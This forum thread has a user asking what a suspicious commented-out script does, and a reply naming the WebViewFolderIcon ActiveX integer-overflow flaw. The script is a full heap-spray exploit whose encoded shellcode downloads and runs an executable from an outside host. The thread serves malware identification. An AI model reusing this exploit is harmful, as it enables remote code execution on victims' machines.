By using this site, you agree to our updated Privacy Policy and our Terms of Use. Manage your Cookies Settings.
459,516 Members | 1,135 Online
Bytes IT Community
+ Ask a Question
Need help? Post your question and get tips & solutions from a community of 459,516 IT Pros & Developers. It's quick & easy.

What is this script doing?

P: n/a
Could someone please give me some idea what this script is doing.

It might be some malicious script that might have been used to spread
virus or to hack username/ password, hence it has been ### so that it
can't be run by default.

thanks.

<!-- <html>
###<body>
###<script>
### var heapSprayToAddress = 0x05050505;
### var shellcode = unescape("%u9090"+"%u9090"+
###"%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u03 20" +
###"%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74 f2" +
###"%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e 8b" +
###"%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u03 8b" +
###"%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u4300%u5c 3a" +
###"%u2e55%u7865%u0065%uc033%u0364%u3040%u0c78%u40 8b" +
###"%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c 40" +
###"%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec 83" +
###"%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6f e8" +
###"%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb 52" +
###"%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83 ff" +
###"%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff 40" +
###"%uffff%uff52%ue8d0%uffd7%uffff%u7468%u7074%u2f 3a" +
###"%u6d2f%u686f%u6973%u776e%u6265%u6973%u6574%u63 2e" +
###"%u2e6f%u6b75%u622f%u6e69%u3264%u652e%u6578%u00 00");
###var heapBlockSize = 0x400000;
###var payLoadSize = shellcode.length * 2;
###var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
###var spraySlide = unescape("%u0505%u0505");
###spraySlide = getSpraySlide(spraySlide,spraySlideSize);
###heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
###memory = new Array();
###
###for (i=0;i<heapBlocks;i++)
###{
### memory[i] = spraySlide + shellcode;
###}
###for ( i = 0 ; i < 128 ; i++)
###{
### try
### {
### var tar = new
ActiveXObject('WebViewFolderIcon.WebViewFolderIcon .1');
### tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
### }
### catch(e){}
###}
###
###function getSpraySlide(spraySlide, spraySlideSize)
###{
### while (spraySlide.length*2<spraySlideSize)
### {
### spraySlide += spraySlide;
### }
### spraySlide = spraySlide.substring(0,spraySlideSize/2);
### return spraySlide;
###}
###
###</script>
###</body>
###</html>
### -->
--

Oct 17 '06 #1
Share this Question
Share on Google+
1 Reply


P: n/a
V S Rawat <VS*****@Invalid.nonewrote:
Could someone please give me some idea what this script is doing.
[snip]
### var tar = new
ActiveXObject('WebViewFolderIcon.WebViewFolderIcon .1');
### tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
"The Microsoft Windows WebViewFolderIcon ActiveX control contains an
integer overflow vulnerability. This may allow a remote, unauthenticated
attacker to execute arbitrary code on a vulnerable system."

in <http://www.kb.cert.org/vuls/id/753044>

--
@@@@@
E -00 comme on est very beaux dis !
' `) /
|\_ =="
Oct 17 '06 #2

This discussion thread is closed

Replies have been disabled for this discussion.